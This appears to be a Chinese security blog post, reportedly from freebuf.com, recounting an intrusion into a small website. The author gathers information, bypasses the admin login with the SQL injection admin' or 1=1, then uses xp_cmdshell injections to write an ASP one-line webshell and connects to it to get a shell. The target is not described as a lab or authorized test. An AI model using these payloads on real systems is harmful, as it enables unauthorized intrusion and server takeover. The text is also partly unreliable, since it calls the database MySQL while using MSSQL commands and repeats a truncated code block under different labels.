信息收集
首先进行常规的信息收集,收集网站的whois信息,ip信息,中间件信息,端口信息等。
然后判断是否具有cdn(我测试的是一个小网站,一般并没有cdn)
我一般是在测速网站测试ip,eg:
* 17CE
1.看是否存在cdn
存在的话,查找真实ip
– 从国外去访问,查看ip信息
– 去掉www,然后查看ip信息
2.旁站信息
– webscan.cc
– 站长之家
3.C段信息
– webscan.cc
– 站长之家
4.子域名信息
– layer子域名挖掘机
– subdomain
5.端口信息
– nmap
– portscan
6.网站目录信息
– dirsearch
– dirb
收集这些信息,目的是扩大攻击面,寻找防护薄弱点和可利用信息
寻找可能存在漏洞的地方
– 登陆界面 可能存在sql注入,可以先使用admin’ or 1=1 –+ 之类的语句尝试绕过
– 搜索界面 可能存在sql注入和存储型和DOM型xss等
– 上传界面 可以上传一些木马之类东西:
eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)
涉及密码或者其它敏感信息的地方 可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化
过程
我收集信息完发现子域名信息后,找到一个可以访问的域名,找出ip,进行端口扫描和网站目录爆破,直接发现了后台管理界面,尝试万能密码进行绕过。
绕过成功,但是里面没有什么可以利用的信息,
只能寻找其它信息或者上传接口,然后以外的发现登录窗口的数据库权限是管理员。
然后尝试调用mysql的写入权限,发现并没有开启,但是我是管理员权限,
查阅资料得到开启mysql存储权限的命令,直接执行。
然后写入一句话木马。
一句话木马:
```sql exec master..xp_cmdshell ```
mysql开启存储过程
```sql exec master..xp_cmdshell ```
echo中使用^转义特殊字符
```sql ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+ ```
定义一个变量,然后将变量输入到文件中
```sql sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+ ```
写入成功之后就可以直接连接了。
获取到shell。
参考链接
https://www.xuebuyuan.com/1851454.html?tdsourcetag=s_pctim_aiomsg
https://blog.csdn.net/l1028386804/article/details/84206143
来源:freebuf.com 2020-09-15 13:38:32 by: tomyyyyy
请登录后发表评论
注册